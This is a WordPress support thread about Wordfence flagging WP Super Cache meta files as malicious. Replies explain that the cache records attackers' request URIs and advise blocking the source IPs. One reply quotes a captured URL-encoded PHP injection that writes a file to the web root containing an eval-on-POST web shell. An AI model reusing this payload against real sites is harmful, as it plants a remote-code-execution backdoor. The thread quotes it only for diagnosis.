File appears to be malicious wp-cache

  • Resolved Ben

    (@benagain)


    8 years, 11 months ago

    Hi everyone,

    Every few days I’ve been getting an email saying that WordFence (v6.0.22 Free) has found a file that appears to be malicious in the WP Super Cache (v1.4.7) directory:

    “* File appears to be malicious: wp-content/cache/meta/wp-cache-b772b3d569b52da8m.php”

    Sometimes I’ll go to the directory and the file won’t be there, but the last time I opened the file I found it had base64 code, which is probably what’s triggering the malicious file warning.

    I’ve been keeping a close eye on the site, and haven’t seen any defacements, or detected any added code in suspicious places, although I am aware WP Super Cache has had vulnerabilities two years ago relating to base64 decoded redirects and such.

    Ben,

    https://www.ads-software.com/plugins/wordfence/

Viewing 3 replies - 1 through 3 (of 3 total)
  • Plugin Author WFMattR

    (@wfmattr)

    Ben,

    Thanks for the report. When the files are gone, that may mean the cache plugin cleared the folder they were in. I haven’t used WP Super Cache much, so I’m not sure of the details.

    We have a guide for cleaning hacked sites here, which may help you find where the attackers are getting in, in order to drop those files:
    How to clean a hacked website

    There are also recommendations to help prevent it in the future, near the end of the page. Sometimes, if you have multiple sites on the same hosting account, there may also be a vulnerability in the other site(s), that can infect the others.

    -Matt R

    @ben:

    Probably no need to panic. WP Super Cache creates meta files of cached pages in the /wp-content/cache/{blogs/BLOG_ADDRESS_IF_MULTISITE/}meta/ folder.

    This is a sample meta file:

    <?php die(); ?>{"headers":{"Content-Encoding":"Content-Encoding: gzip","Vary":"Vary: Accept-Encoding, Cookie","Expires":"Expires: Thu, 19 Nov 1981 08:52:00 GMT","Content-Type":"Content-Type: text\/html; charset=UTF-8","Cache-Control":"Cache-Control: no-store, no-cache, must-revalidate","Pragma":"Pragma: no-cache","Last-Modified":"Last-Modified: Wed, 18 May 2016 11:29:25 GMT"},"uri":"domain.tld\/?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27%2Fconfigurationbak.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B",...}

    There’s base64_decode in the above, but that is only because someone is making these URI requests, with the malicious query string.

    The cache (and corresponding meta files) are temporary, so they are deleted when no longer needed (mostly based on your settings in WP Super Cache).

    Find the IPs of the requester in WF live activity and block it (preferably permanently), and make sure to keep core, plugins and themes up to date.

    Happy surfing ??

    Hey, thanks @n Atta Kusi Adusei – nice advice to block the IP… one note for folks, since I had forgotten this – once you block the IP in ‘Live Traffic’, you switch over to ‘Blocked IPs’ to make it permanent.

Viewing 3 replies - 1 through 3 (of 3 total)
  • The topic ‘File appears to be malicious wp-cache’ is closed to new replies.